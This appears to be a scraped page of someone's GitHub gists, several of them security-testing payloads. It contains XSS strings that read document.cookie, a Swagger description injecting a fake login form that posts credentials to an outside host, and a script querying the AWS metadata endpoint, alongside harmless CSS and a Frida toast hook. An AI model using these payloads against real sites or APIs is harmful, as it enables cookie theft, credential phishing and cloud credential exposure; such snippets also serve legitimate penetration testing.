This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | <html> | |
| <img src=x onerror=alert(document.cookie);prompt(document.cookie,1)> | |
| </html> | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | { | |
| "url": "https://gist.github.com/eduquintanilha/606fec1080eb63fa4a22f091e8ebfac7/raw/4f605290dc8f8846a186d44826a4e4d8d18457c0/xss.yaml", | |
| "urls": [ | |
| { | |
| "url": "https://gist.github.com/eduquintanilha/606fec1080eb63fa4a22f091e8ebfac7/raw/4f605290dc8f8846a186d44826a4e4d8d18457c0/xss.yaml", | |
| "name": "Test" | |
| } | |
| ] | |
| } | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | swagger: '2.0' | |
| info: | |
| title: XSS Attack Test | |
| description: | | |
| <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=prompt(1337,document.cookie) src=1>"></form> | |
| version: production | |
| basePath: / | |
| produces: | |
| - application/xml | |
| - application/json | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | h1 { | |
| color: gray; | |
| margin-left: 20px; | |
| } | |
| button { | |
| padding: 2px; | |
| margin: 1px solid red; | |
| } | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | { | |
| "url": "https://gist.github.com/eduquintanilha/dfad096d3be348c46814b25c2dd722c9/raw/b24b9a6d5ee951f45297677635320a198d4373a7/fake-login.yaml", | |
| "urls": [ | |
| { | |
| "url": "https://gist.github.com/eduquintanilha/dfad096d3be348c46814b25c2dd722c9/raw/b24b9a6d5ee951f45297677635320a198d4373a7/fake-login.yaml", | |
| "name": "Test" | |
| } | |
| ] | |
| } | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | swagger: '2.0' | |
| info: | |
| version: 1.0.0 | |
| title: Fake Login Page | |
| description: '<div class="login-form"> | |
| <div class="heading"> | |
| <h1>HTML Injection : Fake Login</h1> | |
| </div> | |
| <div class="form-container"> | |
| <form action="https://test.quintanilha.com/login" method="post" class="form-signin"> | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | Java.scheduleOnMainThread(function() { | |
| Toast = Java.use("android.widget.Toast"); | |
| var currentApplication = Java.use('android.app.ActivityThread').currentApplication(); | |
| var context = currentApplication.getApplicationContext(); | |
| Toast.makeText(context,"hello world", Toast.LENGTH_SHORT.value).show(); | |
| }); | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | #!/bin/bash | |
| # https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html | |
| METADATA_TOKEN=test | |
| function get { | |
| ./curl -sf http://169.254.169.254/latest/$1 2> /dev/null | |
| } | |
| >&2 echo "Fetching metadata..." | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | <html> | |
| <body> | |
| <input type="text" id="user"></input> | |
| <input type="password" id="password"></input> | |
| <button id="login">Entrar</button> | |
| <script> | |
| let button = document.querySelector('#login') | |
| button.addEventListener('click', function clicou() { | |
| const user = document.querySelector('#user').value; | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | echo WORK | |
| id | |
| whoami | 
NewerOlder